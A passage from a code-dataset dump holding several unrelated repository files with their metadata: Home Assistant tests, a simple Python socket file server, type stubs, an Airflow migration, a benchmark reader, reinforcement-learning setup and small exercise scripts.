accessories = await setup_accessories_from_file(
hass, "home_assistant_bridge_fan.json"
)
config_entry, pairing = await setup_test_accessories(hass, accessories)
entity_registry = await hass.helpers.entity_registry.async_get_registry()
# Check that the fan is correctly found and set up
fan_id = "fan.living_room_fan"
fan = entity_registry.async_get(fan_id)
assert fan.unique_id == "homekit-fan.living_room_fan-8"
fan_helper = Helper(
hass, "fan.living_room_fan", pairing, accessories[0], config_entry,
)
fan_state = await fan_helper.poll_and_get_state()
assert fan_state.attributes["friendly_name"] == "Living Room Fan"
assert fan_state.state == "off"
assert fan_state.attributes["supported_features"] == (
SUPPORT_DIRECTION | SUPPORT_SET_SPEED | SUPPORT_OSCILLATE
)
device_registry = await hass.helpers.device_registry.async_get_registry()
device = device_registry.async_get(fan.device_id)
assert device.manufacturer == "Home Assistant"
assert device.name == "Living Room Fan"
assert device.model == "Fan"
assert device.sw_version == "0.104.0.dev0"
bridge = device = device_registry.async_get(device.via_device_id)
assert bridge.manufacturer == "Home Assistant"
assert bridge.name == "Home Assistant Bridge"
assert bridge.model == "Bridge"
assert bridge.sw_version == "0.104.0.dev0"
|
[
"balloob@gmail.com"
] |
balloob@gmail.com
|
9b9c66415e4cc7864cca1de30a392308b4d18434
|
3deef77b752c9940ac1cbe35dbcfb6a9ede59c67
|
/12day/03.WSGIServer.py
|
d2a68325e7e005d5449172bdc125a07b9a6af31b
|
[] |
no_license
|
vstarman/python_codes
|
c682a4aa96e90172da6292f4e245da4a41c97531
|
64ddd38af6cf65861602620a0196bc460bc359d4
|
refs/heads/master
| 2021-09-05T01:31:55.882001
| 2018-01-23T12:43:45
| 2018-01-23T12:43:45
| 114,988,789
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,421
|
py
|
import socket, time, re, sys
class WSGIServer():
    """A simple WSGI-style static file server class."""
def __init__(self, documents_root, port=8080):
        # create the listening socket (TCP, so listen/accept work)
        self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# reuse
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# BIND
self.server_socket.bind(("", port))
# listen
self.server_socket.listen(128)
        # non-blocking accept()
        self.server_socket.setblocking(False)
        # list of connected client sockets
self.client_socket_list = []
self.documents_root = documents_root
    def run_forever(self):
        """Run the server loop."""
while True:
try:
#time.sleep(0.5)
new_socket, new_addr = self.server_socket.accept()
except Exception as e:
print("---------1---------",e)
else:
new_socket.setblocking(False)
self.client_socket_list.append(new_socket)
for client_socket in self.client_socket_list:
try:
request = client_socket.recv(1024).decode()
except Exception as e:
print("---------2---------", e)
else:
if request:
self.deal_with_request(request, client_socket)
else:
client_socket.close()
self.client_socket_list.remove(client_socket)
print(self.client_socket_list)
    def deal_with_request(self, request, client_socket):
        """Serve the current client request."""
if not request:
return
request_lines = request.splitlines()
for i, line in enumerate(request_lines):
print(i, "\t", line)
        # extract the requested file from the request line
ret = re.match(r"[^/]*([^ ]+)", request_lines[0])
if ret:
            print("extracted path>>>>[%s]" % ret.group(1))
file_name = ret.group(1)
if file_name == "/":
file_name = "index.html"
else:
return
        # read the requested file
try:
f = open(self.documents_root + file_name, "rb")
except:
            response_body = "file not found, please enter a correct URL"
response_header = "HTTP/1.1 404 not found\r\n"
response_header += "Content-Type: text/html; charset=utf-8\r\n"
response_header += "Content-Length: %d\r\n" % (len(response_body))
response_header += "\r\n"
            # send the response back to the browser
client_socket.send((response_header + response_body).encode())
else:
content = f.read()
f.close()
response_body = content
            response_header = "HTTP/1.1 200 OK\r\n"
response_header += "Content-Length: %d\r\n" % (len(response_body))
response_header += "\r\n"
            client_socket.send(response_header.encode() + response_body)  # body is already bytes (file opened in 'rb')
def main():
    """Control the web server as a whole."""
    port = 8080
    if len(sys.argv) == 2 and sys.argv[1].isdigit():
        port = int(sys.argv[1])
    elif len(sys.argv) > 2:
        print("Usage: python3 xxx.py 7890")
        return
    http_server = WSGIServer("./html", port)
    http_server.run_forever()
if __name__ == '__main__':
main()
|
[
"vstarman@foxmail.com"
] |
vstarman@foxmail.com
|
79d6585724e04b28bac073cb392c9c5ef0bd59b8
|
d4a569dcf616b7f05e53a44803e38196b436b8b9
|
/Thesis@3.9.1/Lib/site-packages/mypy/typeshed/stdlib/3/sys.pyi
|
d4f755c1ad33599685ded3ba3658e1b9ccca7d02
|
[
"MIT"
] |
permissive
|
nverbois/TFE21-232
|
ac3178d24939c872c02a671c0f1d8cc471af516b
|
7113837b5263b5c508bfc6903cb6982b48aa7ee4
|
refs/heads/main
| 2023-06-05T18:50:59.207392
| 2021-06-25T19:54:40
| 2021-06-25T19:54:40
| 337,691,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,925
|
pyi
|
# Stubs for sys
# Ron Murawski <ron@horizonchess.com>
# based on http://docs.python.org/3.2/library/sys.html
from typing import (
List,
NoReturn,
Sequence,
Any,
Dict,
Tuple,
TextIO,
overload,
Optional,
Union,
TypeVar,
Callable,
Type,
)
import sys
from types import FrameType, ModuleType, TracebackType
from importlib.abc import MetaPathFinder
_T = TypeVar("_T")
# The following type aliases are stub-only and do not exist at runtime
_ExcInfo = Tuple[Type[BaseException], BaseException, TracebackType]
_OptExcInfo = Union[_ExcInfo, Tuple[None, None, None]]
# ----- sys variables -----
abiflags: str
argv: List[str]
base_exec_prefix: str
base_prefix: str
byteorder: str
builtin_module_names: Sequence[str] # actually a tuple of strings
copyright: str
# dllhandle = 0 # Windows only
dont_write_bytecode: bool
displayhook: Callable[[object], Any]
excepthook: Callable[[Type[BaseException], BaseException, TracebackType], Any]
exec_prefix: str
executable: str
float_repr_style: str
hexversion: int
last_type: Optional[Type[BaseException]]
last_value: Optional[BaseException]
last_traceback: Optional[TracebackType]
maxsize: int
maxunicode: int
meta_path: List[MetaPathFinder]
modules: Dict[str, ModuleType]
path: List[str]
path_hooks: List[Any] # TODO precise type; function, path to finder
path_importer_cache: Dict[str, Any] # TODO precise type
platform: str
if sys.version_info >= (3, 9):
platlibdir: str
prefix: str
if sys.version_info >= (3, 8):
pycache_prefix: Optional[str]
ps1: str
ps2: str
stdin: TextIO
stdout: TextIO
stderr: TextIO
__stdin__: TextIO
__stdout__: TextIO
__stderr__: TextIO
tracebacklimit: int
version: str
api_version: int
warnoptions: Any
# Each entry is a tuple of the form (action, message, category, module,
# lineno)
# winver = '' # Windows only
_xoptions: Dict[Any, Any]
flags: _flags
class _flags:
debug: int
division_warning: int
inspect: int
interactive: int
optimize: int
dont_write_bytecode: int
no_user_site: int
no_site: int
ignore_environment: int
verbose: int
bytes_warning: int
quiet: int
hash_randomization: int
if sys.version_info >= (3, 7):
dev_mode: int
utf8_mode: int
float_info: _float_info
class _float_info:
epsilon: float # DBL_EPSILON
dig: int # DBL_DIG
mant_dig: int # DBL_MANT_DIG
max: float # DBL_MAX
max_exp: int # DBL_MAX_EXP
max_10_exp: int # DBL_MAX_10_EXP
min: float # DBL_MIN
min_exp: int # DBL_MIN_EXP
min_10_exp: int # DBL_MIN_10_EXP
radix: int # FLT_RADIX
rounds: int # FLT_ROUNDS
hash_info: _hash_info
class _hash_info:
width: int
modulus: int
inf: int
nan: int
imag: int
implementation: _implementation
class _implementation:
name: str
version: _version_info
hexversion: int
cache_tag: str
int_info: _int_info
class _int_info:
bits_per_digit: int
sizeof_digit: int
class _version_info(Tuple[int, int, int, str, int]):
major: int
minor: int
micro: int
releaselevel: str
serial: int
version_info: _version_info
def call_tracing(__func: Callable[..., _T], __args: Any) -> _T: ...
def _clear_type_cache() -> None: ...
def _current_frames() -> Dict[int, Any]: ...
def _debugmallocstats() -> None: ...
def __displayhook__(value: object) -> None: ...
def __excepthook__(
type_: Type[BaseException], value: BaseException, traceback: TracebackType
) -> None: ...
def exc_info() -> _OptExcInfo: ...
# sys.exit() accepts an optional argument of anything printable
def exit(__status: object = ...) -> NoReturn: ...
def getdefaultencoding() -> str: ...
if sys.platform != "win32":
# Unix only
def getdlopenflags() -> int: ...
def getfilesystemencoding() -> str: ...
def getrefcount(__object: Any) -> int: ...
def getrecursionlimit() -> int: ...
@overload
def getsizeof(obj: object) -> int: ...
@overload
def getsizeof(obj: object, default: int) -> int: ...
def getswitchinterval() -> float: ...
def _getframe(__depth: int = ...) -> FrameType: ...
_ProfileFunc = Callable[[FrameType, str, Any], Any]
def getprofile() -> Optional[_ProfileFunc]: ...
def setprofile(profilefunc: Optional[_ProfileFunc]) -> None: ...
_TraceFunc = Callable[
[FrameType, str, Any], Optional[Callable[[FrameType, str, Any], Any]]
]
def gettrace() -> Optional[_TraceFunc]: ...
def settrace(tracefunc: Optional[_TraceFunc]) -> None: ...
class _WinVersion(
Tuple[int, int, int, int, str, int, int, int, int, Tuple[int, int, int]]
):
major: int
minor: int
build: int
platform: int
service_pack: str
service_pack_minor: int
service_pack_major: int
    suite_mask: int
product_type: int
platform_version: Tuple[int, int, int]
def getwindowsversion() -> _WinVersion: ... # Windows only
def intern(__string: str) -> str: ...
def is_finalizing() -> bool: ...
if sys.version_info >= (3, 7):
__breakpointhook__: Any # contains the original value of breakpointhook
def breakpointhook(*args: Any, **kwargs: Any) -> Any: ...
def setdlopenflags(__flags: int) -> None: ... # Linux only
def setrecursionlimit(__limit: int) -> None: ...
def setswitchinterval(__interval: float) -> None: ...
def gettotalrefcount() -> int: ... # Debug builds only
if sys.version_info < (3, 9):
def getcheckinterval() -> int: ... # deprecated
def setcheckinterval(__n: int) -> None: ... # deprecated
if sys.version_info >= (3, 8):
# not exported by sys
class UnraisableHookArgs:
exc_type: Type[BaseException]
exc_value: Optional[BaseException]
exc_traceback: Optional[TracebackType]
err_msg: Optional[str]
object: Optional[object]
unraisablehook: Callable[[UnraisableHookArgs], Any]
def addaudithook(hook: Callable[[str, Tuple[Any, ...]], Any]) -> None: ...
def audit(__event: str, *args: Any) -> None: ...
|
[
"38432529+nverbois@users.noreply.github.com"
] |
38432529+nverbois@users.noreply.github.com
|
a743c452d4c63fee68c318c62fa4043b50388f12
|
7137161629a1003583744cc3bd0e5d3498e0a924
|
/airflow/migrations/versions/142555e44c17_add_data_interval_start_end_to_dagmodel_and_dagrun.py
|
2eedcb81c6444f27cf2d8e79fb281f9a9134fc2e
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
jbampton/airflow
|
3fca85975854eb916f16143b659a9119af143963
|
dcfa14d60dade3fdefa001d10013466fe4d77f0d
|
refs/heads/master
| 2023-05-25T22:31:49.104069
| 2021-09-18T19:18:32
| 2021-09-18T19:18:32
| 247,645,744
| 3
| 0
|
Apache-2.0
| 2020-03-16T08:12:58
| 2020-03-16T08:12:57
| null |
UTF-8
|
Python
| false
| false
| 2,859
|
py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Add data_interval_[start|end] to DagModel and DagRun.
Revision ID: 142555e44c17
Revises: 54bebd308c5f
Create Date: 2021-06-09 08:28:02.089817
"""
from alembic import op
from sqlalchemy import TIMESTAMP, Column
from sqlalchemy.dialects import mssql, mysql
# Revision identifiers, used by Alembic.
revision = "142555e44c17"
down_revision = "54bebd308c5f"
branch_labels = None
depends_on = None
def _use_date_time2(conn):
result = conn.execute(
"""SELECT CASE WHEN CONVERT(VARCHAR(128), SERVERPROPERTY ('productversion'))
like '8%' THEN '2000' WHEN CONVERT(VARCHAR(128), SERVERPROPERTY ('productversion'))
like '9%' THEN '2005' ELSE '2005Plus' END AS MajorVersion"""
).fetchone()
mssql_version = result[0]
return mssql_version not in ("2000", "2005")
def _get_timestamp(conn):
dialect_name = conn.dialect.name
if dialect_name == "mysql":
return mysql.TIMESTAMP(fsp=6, timezone=True)
if dialect_name != "mssql":
return TIMESTAMP(timezone=True)
if _use_date_time2(conn):
return mssql.DATETIME2(precision=6)
return mssql.DATETIME
def upgrade():
"""Apply data_interval fields to DagModel and DagRun."""
column_type = _get_timestamp(op.get_bind())
with op.batch_alter_table("dag_run") as batch_op:
batch_op.add_column(Column("data_interval_start", column_type))
batch_op.add_column(Column("data_interval_end", column_type))
with op.batch_alter_table("dag") as batch_op:
batch_op.add_column(Column("next_dagrun_data_interval_start", column_type))
batch_op.add_column(Column("next_dagrun_data_interval_end", column_type))
def downgrade():
"""Unapply data_interval fields to DagModel and DagRun."""
with op.batch_alter_table("dag_run") as batch_op:
batch_op.drop_column("data_interval_start")
batch_op.drop_column("data_interval_end")
with op.batch_alter_table("dag") as batch_op:
batch_op.drop_column("next_dagrun_data_interval_start")
batch_op.drop_column("next_dagrun_data_interval_end")
|
[
"noreply@github.com"
] |
jbampton.noreply@github.com
|
5d1e6afc58cdf15e0476c647d701b742ce6780f6
|
60cf82eeddce21893f06a4b76e5b0515430b3ef2
|
/src/sintax/formats/criterion.py
|
a1e085b7288cde54d37257460d492ba2b9018613
|
[
"ISC"
] |
permissive
|
theasylum/sintax
|
963e89c0984ee22b4f873d62cdac063efc6b748f
|
a81fdf1a891595168df53ac1d177d99eac16fb76
|
refs/heads/master
| 2020-06-22T15:26:33.171259
| 2019-07-19T08:46:29
| 2019-07-19T08:46:29
| 197,737,261
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,797
|
py
|
"""
Reads Criterion "raw.csv" files, and returns the resulting input into a
dictionary that can be further manipulated.
Criterion stores results as follows:
$PROJECT/target/criterion/{benchmark group}/{function name}/
{value passed to function (parameters)}/
Inside that folder there are two other folders, named:
- base: This is the results from the previous or first run
- new: This is the most current results from the current run
We basically have to walk the directory tree, find each of the raw.csv
files inside the new folder, and then parse that.
Criterion runs the same benchmark function multiple times, with multiple
iteration counts, mainly to get a good statistical sampling. This means the
.csv files contain 1 or more entries.
"""
import csv
import os
from pathlib import Path
def _name(group, function, value):
if value:
return f"{group}/{function}/{value}"
return f"{group}/{function}"
def _build_results(path, *, aggregate=False):
"""
    Reads a CSV file and yields the results as dictionaries one by one; if the
    file is not a valid Criterion .csv it is ignored and nothing is yielded
"""
with open(path, newline="") as raw_csv:
header = raw_csv.readline()
if header.strip() != "group,function,value,sample_time_nanos,iteration_count":
return
criterion_csv = csv.DictReader(
raw_csv,
fieldnames=(
"group",
"function",
"value",
"sample_time_nanos",
"iteration_count",
),
)
for row in criterion_csv:
yield {
"name": _name(row["group"], row["function"], row["value"]),
"iterations": row["iteration_count"],
# Criterion doesn't differentiate between real time that has
# expired vs the amount of CPU time used, so we just set them
# to be the same
"real_time": row["sample_time_nanos"],
"cpu_time": row["sample_time_nanos"],
"time_unit": "ns",
"run_type": "iteration",
}
def reader(path, *, aggregate=False):
"""
    Yields results for each of the raw.csv files found in the path provided.
Unfortunately the files are not collected together into a single location
by default.
"""
for root, dirs, files in os.walk(path):
if {"new", "base"} <= set(dirs):
# We are now inside a test directory where we want to read new/raw.csv
yield from _build_results(
Path(root) / "new" / "raw.csv", aggregate=aggregate
)
else: # pragma: nocover (bug in coverage)
continue
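# --- Hedged usage sketch (not part of the original module) ---
# The module docstring above describes the Criterion directory layout; this
# shows one way the reader() generator might be consumed. The
# "target/criterion" path is an assumption about a typical Rust project
# layout, not something defined in this file.
if __name__ == "__main__":
    for result in reader("target/criterion"):
        print(f"{result['name']}: {result['real_time']} {result['time_unit']}")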
|
[
"bertjw@regeer.org"
] |
bertjw@regeer.org
|
753ead96f492949a999e23032b1dce59150254e9
|
ba99df13d39dc8aa696c38a6c49d5193ce5c4c80
|
/scripts/box3d_trpo/run_box3d_pixel_v15_tf_fred_arch.py
|
bf6b510b2555cccd040e0c4dd8d3f1264665f7e8
|
[
"MIT"
] |
permissive
|
fredshentu/public_model_based_controller
|
e5434ec075420ec5dd6d7355ba4751744a9b6248
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
refs/heads/master
| 2021-08-28T01:08:12.166349
| 2017-12-11T01:11:36
| 2017-12-11T01:11:36
| 113,795,659
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
import os
from sandbox.rocky.tf.baselines.nn_baseline import NNBaseline
from sandbox.rocky.tf.core.network import ConvNetwork
from sandbox.rocky.tf.policies.gaussian_conv_feature_policy import GaussianConvFeaturePolicy
from sandbox.rocky.tf.policies.gaussian_conv_policy import GaussianConvPolicy
from rllab.baselines.zero_baseline import ZeroBaseline
from rllab.envs.normalized_env import normalize
from sandbox.rocky.tf.samplers.batch_sampler import BatchSampler
from sandbox.rocky.tf.algos.trpo import TRPO
from rllab.misc.instrument import stub, run_experiment_lite
from sandbox.rocky.tf.envs.base import TfEnv
from rllab.envs.gym_env import GymEnv
import itertools
import tensorflow as tf
stub(globals())
# Params range
seeds = range(0, 2)
for seed in seeds:
env = TfEnv(normalize(env=GymEnv('Box3dReachPixel-v15',record_video=False, \
log_dir='/tmp/gym_test',record_log=False)))
env_spec = env.spec
policy_cnn = ConvNetwork(
name="policy_conv_network",
input_shape=env_spec.observation_space.shape,
output_dim=env_spec.action_space.flat_dim,
conv_filters=(64, 64, 64, 32),
conv_filter_sizes=((5,5),(5,5),(5,5),(3,3)),
conv_strides=(3, 3, 3, 2),
conv_pads=('SAME', 'SAME', 'SAME', 'SAME'),
hidden_sizes=(256,),
hidden_nonlinearity=tf.nn.relu,
output_nonlinearity=None,
)
baseline_cnn = ConvNetwork(
name="baseline_conv_network",
input_shape=env_spec.observation_space.shape,
output_dim=env_spec.action_space.flat_dim,
conv_filters=(64, 64, 64, 32),
conv_filter_sizes=((5,5),(5,5),(5,5),(3,3)),
conv_strides=(3, 3, 3, 2),
conv_pads=('SAME', 'SAME', 'SAME', 'SAME'),
hidden_sizes=(256,),
hidden_nonlinearity=tf.nn.relu,
output_nonlinearity=None,
)
policy = GaussianConvFeaturePolicy(
"conv_feature_policy",
env_spec=env_spec,
feature_network=policy_cnn,
hidden_sizes=(128,64),
clip_action=False,
)
baseline = NNBaseline(
env_spec=env_spec,
feature_network=baseline_cnn,
hidden_sizes=(128,64),
hidden_nonlinearity=tf.nn.relu,
init_lr=5e-4,
n_itr=10,
train_feature_network=True,
)
batch_size = 9600
algo = TRPO(
env=env,
policy=policy,
baseline=baseline,
batch_size=batch_size,
whole_paths=True,
max_path_length=1000,
n_itr=1000,
step_size=0.01,
subsample_factor=1.0,
sampler_cls=BatchSampler,
optimizer_args={
'num_slices' : 8,
}
)
run_experiment_lite(
algo.train(),
exp_prefix='trpo_box3d_pixel_v15_tf_fred_arch',
n_parallel=12,
snapshot_mode="gap",
snapshot_gap=200,
seed=seed,
mode="local"
)
|
[
"fred960315@gmail.com"
] |
fred960315@gmail.com
|
a7792d90a0b66b5d879402881bb716e6b36e682e
|
18a7c2173eb4fbb66bcc8b2ef117aad863846b83
|
/etc/krri.py
|
2d80dc5b94937d43053fc554347ee0e474096650
|
[] |
no_license
|
mynameiskirang/python
|
5968607f6f61406e9f4b69b1a9edff31e84df153
|
4a48ea50378f9e079d0ece9110fc33afadf77434
|
refs/heads/master
| 2020-05-19T17:49:50.720578
| 2019-04-21T16:13:28
| 2019-04-21T16:13:28
| null | 0
| 0
| null | null | null | null |
UHC
|
Python
| false
| false
| 1,066
|
py
|
import csv
col = 10
blank = 4
arr = [[""]*(col*blank) for i in range(600000)]
setting = [[""]*8 for i in range(27)]
Num = 0
for num in range(1,10):
for i in range(0, col):
for j in range(0, 10):
try:
                # file to read
rname= "Graph"+str(num)+"_Wave_Tshort_00" + str(i) + str(j) + ".csv"
print(rname)
rf = open(rname)
Num = num
except Exception as E:
                # skip this file if it does not exist
print(E)
continue
reader = csv.reader(rf, delimiter=',')
reader = list(reader)
if i==0 and j==0:
for k in range(0,27):
setting[k] = reader[k]
for k in range(27, 60027):
arr[k-27 + j*60000][i*blank +1] = reader[k][1]
f = open('Graph'+str(Num)+'_Wave_Tshort.csv', 'w', encoding='utf-8', newline='')
wf = csv.writer(f)
for i in range(0, 27):
wf.writerow(setting[i])
for i in range(0, 600000):
wf.writerow(arr[i])
|
[
"na_qa@icloud.com"
] |
na_qa@icloud.com
|
cfd926890b7a12f971499b3d9a97b2535364d58e
|
786027545626c24486753351d6e19093b261cd7d
|
/ghidra9.2.1_pyi/ghidra/util/graph/Edge.pyi
|
2e34bad38d5952aca6e6483e08bacaac28e839b6
|
[
"MIT"
] |
permissive
|
kohnakagawa/ghidra_scripts
|
51cede1874ef2b1fed901b802316449b4bf25661
|
5afed1234a7266c0624ec445133280993077c376
|
refs/heads/main
| 2023-03-25T08:25:16.842142
| 2021-03-18T13:31:40
| 2021-03-18T13:31:40
| 338,577,905
| 14
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,520
|
pyi
|
import ghidra.util.graph
import java.lang
class Edge(object, ghidra.util.graph.KeyedObject, java.lang.Comparable):
"""
An Edge joins a pair of vertices.
The from and to vertex of an edge can not be changed.
"""
def __init__(self, from_: ghidra.util.graph.Vertex, to: ghidra.util.graph.Vertex):
"""
@param from The from or parent vertex.
@param to The to or child vertex.
"""
...
@overload
def compareTo(self, edge: ghidra.util.graph.Edge) -> int:
"""
Compare one edge to another. Based on time of creation.
"""
...
@overload
def compareTo(self, __a0: object) -> int: ...
def equals(self, obj: object) -> bool:
"""
        Overrides equals method by comparing keys.
"""
...
def from(self) -> ghidra.util.graph.Vertex:
"""
Returns from vertex.
"""
...
def getClass(self) -> java.lang.Class: ...
def hashCode(self) -> int: ...
def key(self) -> long:
"""
Returns the key of this edge.
"""
...
def notify(self) -> None: ...
def notifyAll(self) -> None: ...
def to(self) -> ghidra.util.graph.Vertex:
"""
Returns to vertex.
"""
...
def toString(self) -> unicode: ...
@overload
def wait(self) -> None: ...
@overload
def wait(self, __a0: long) -> None: ...
@overload
def wait(self, __a0: long, __a1: int) -> None: ...
|
[
"tsunekou1019@gmail.com"
] |
tsunekou1019@gmail.com
|
859989ba770691ea96442cfcb7bbca9d2a652d36
|
9cdfe7992090fb91696eec8d0a8ae15ee12efffe
|
/greedy/maxMeetingsInRoom.py
|
c72a5d81483d96a85aa1f85718ef0ebd0ad17341
|
[] |
no_license
|
binchen15/leet-python
|
e62aab19f0c48fd2f20858a6a0d0508706ae21cc
|
e00cf94c5b86c8cca27e3bee69ad21e727b7679b
|
refs/heads/master
| 2022-09-01T06:56:38.471879
| 2022-08-28T05:15:42
| 2022-08-28T05:15:42
| 243,564,799
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 573
|
py
|
# wrong answer. Suspect the solution is wrong (see the alternative sketch below)
from typing import List
class Solution:
def maxMeetings(self, N : int, S : List[int], F : List[int]) -> List[int]:
# code here
meets = list(zip(F, S, range(1, N+1)))
meets.sort(key = lambda x: (x[0], x[1]))
ans = [meets[0]]
i = 1
while i < N:
while i < N and meets[i][1] <= ans[-1][0]:
i += 1
if i < N:
ans.append(meets[i])
i += 1
else:
break
return sorted([meet[2] for meet in ans])
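# --- Hedged alternative sketch (not the submitted solution above) ---
# The classic greedy for "maximum meetings in one room" sorts meetings by
# finish time and accepts a meeting only when it starts strictly after the
# last accepted finish. The helper below is illustrative only.
def max_meetings_greedy(N, S, F):
    order = sorted(range(N), key=lambda i: F[i])
    chosen, last_end = [], -1
    for i in order:
        if S[i] > last_end:
            chosen.append(i + 1)  # meetings are numbered from 1
            last_end = F[i]
    return sorted(chosen)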
|
[
"binchen.swe@gmail.com"
] |
binchen.swe@gmail.com
|
7d0de73ae40f72ae5e0dd9c1981cc60ab149e75e
|
0b793bce2da8c3d09b7956c0672ddbffd46feaed
|
/atcoder/arc/arc084_a.py
|
d067d9c30e55cb49bb016c94a255db4d323cc47e
|
[
"MIT"
] |
permissive
|
knuu/competitive-programming
|
c6c4e08fb231937d988bdc5a60a8ad6b31b97616
|
16bc68fdaedd6f96ae24310d697585ca8836ab6e
|
refs/heads/master
| 2021-01-17T09:39:02.647688
| 2020-11-07T03:17:22
| 2020-11-07T03:17:22
| 27,886,732
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 332
|
py
|
from bisect import bisect_left
N = int(input())
A = sorted(int(x) for x in input().split())
B = sorted(int(x) for x in input().split())
C = sorted(int(x) for x in input().split())
cnt = [0] * (N + 1)
for i, b in enumerate(B):
cnt[i + 1] = bisect_left(A, b)
cnt[i + 1] += cnt[i]
print(sum(cnt[bisect_left(B, c)] for c in C))
|
[
"premier3next@gmail.com"
] |
premier3next@gmail.com
|
ac79f8d7257e3bf527da58a1c4b70d913cda6521
|
39e1e256acae3fe9be4434024d42b9bb47bdd02f
|
/analysis/submissions/e88d1e36c4db7410802b3fda6db81d38_task1-1_1597071296/task1-1/main.py
|
bf7fdcd651f55cfacb57e5584ca141091694c7ef
|
[] |
no_license
|
neulab/tranx-study
|
9fb67b9a2181f0b362e4f97316c502eee4539b19
|
e2a7089689f7f95e773e19c8f19513abe4fb8b9b
|
refs/heads/master
| 2023-06-14T04:46:01.010892
| 2021-07-08T09:29:05
| 2021-07-08T09:29:05
| 250,357,553
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 366
|
py
|
# Example code, write your program here
import random
import string
import pprint
characters_list=[]
int_list=[]
for i in range(100):
characters_list.append(random.choice(string.ascii_lowercase))
int_list.append(random.randint(1, 21))
#print(characters_list)
#print(int_list)
dictionary = dict(zip(characters_list, int_list))
pprint.pprint(dictionary)
|
[
"frankxu2004@gmail.com"
] |
frankxu2004@gmail.com
|
4e452ec076db8ba7fd506905ae39e9d8ae5a789b
|
0d9fda11b6f6b0cb1cf397aa45dd21cf3a612b15
|
/docs/projects/oop-in-python/msdie.py
|
927ff5409510a059756145ac111486be6e4d03e7
|
[
"MIT"
] |
permissive
|
milpontiangwenya/tech-department
|
c98eb9375558c81f022a9615b3f9c53fa2cfa4b9
|
7a4e7d7cd2675c19510cf9a80dcac504674111ce
|
refs/heads/master
| 2022-02-07T12:46:27.927665
| 2019-07-23T06:45:05
| 2019-07-23T06:45:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
#class definition for an n-sided die
#import packages
class MSdie:
    pass  # skeleton left as an exercise; see the sketch below
#constructor here
#define classmethod 'roll' to roll the MSdie
#define classmethod 'getValue' to return the current value of the MSdie
#define classmethod 'setValue' to set the die to a particular value
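# --- Hedged sketch of how the skeleton above might be filled in ---
# One plausible reading of the comments: an n-sided die (defaulting to six
# sides) with roll/getValue/setValue methods. The class name MSdieExample
# and the default of 6 sides are assumptions, not the project's solution.
import random
class MSdieExample:
    def __init__(self, sides=6):
        self.sides = sides
        self.value = 1
    def roll(self):
        self.value = random.randint(1, self.sides)
    def getValue(self):
        return self.value
    def setValue(self, value):
        self.value = value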
|
[
"sheena.oconnell@gmail.com"
] |
sheena.oconnell@gmail.com
|
16dc363eea70d018e7688966abab2cf64ad39754
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_144/ch46_2020_04_06_19_03_41_278160.py
|
359be63da56cf45e5606981e79c2a3b001d2471e
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 177
|
py
|
def numero_no_indice(lista):
i = 0
new_list = []
while i < len(lista):
if lista[i] == i:
new_list.append(i)
i +=1
return new_list
|
[
"you@example.com"
] |
you@example.com
|
e05c00915f992b03e9d9703f593bb0844b22ee57
|
ddc15592dede715b4aff97a10009d39bba76e566
|
/lsnm_in_python/analysis/avg_FC_diffs_across_subjs.py
|
d5dbdd3821babd54263ffe896edda9a788746676
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
xlong0513/Brain_inspired
|
d8a5c02da17f56d8906d5fa76efd3a757c5b5ae0
|
816c1c4fd5eb19d0463ba19c0a8c0db8465b4912
|
refs/heads/master
| 2022-06-01T20:44:07.366460
| 2020-05-05T10:05:36
| 2020-05-05T10:05:36
| 256,150,573
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,842
|
py
|
# ============================================================================
#
# PUBLIC DOMAIN NOTICE
#
# National Institute on Deafness and Other Communication Disorders
#
# This software/database is a "United States Government Work" under the
# terms of the United States Copyright Act. It was written as part of
# the author's official duties as a United States Government employee and
# thus cannot be copyrighted. This software/database is freely available
# to the public for use. The NIDCD and the U.S. Government have not placed
# any restriction on its use or reproduction.
#
# Although all reasonable efforts have been taken to ensure the accuracy
# and reliability of the software and data, the NIDCD and the U.S. Government
# do not and cannot warrant the performance or results that may be obtained
# by using this software or data. The NIDCD and the U.S. Government disclaim
# all warranties, express or implied, including warranties of performance,
# merchantability or fitness for any particular purpose.
#
# Please cite the author in any work or product based on this material.
#
# ==========================================================================
# ***************************************************************************
#
# Large-Scale Neural Modeling software (LSNM)
#
# Section on Brain Imaging and Modeling
# Voice, Speech and Language Branch
# National Institute on Deafness and Other Communication Disorders
# National Institutes of Health
#
# This file (avg_FC_diffs_across_subjs.py) was created on December 3, 2016.
#
#
# Author: Antonio Ulloa
#
# Last updated by Antonio Ulloa on December 3 2016
#
# **************************************************************************/
#
# avg_FC_diffs_across_subjs.py
#
# Reads functional connectivity differences from input files corresponding to
# different subjects and calculates an average, after which it displays the
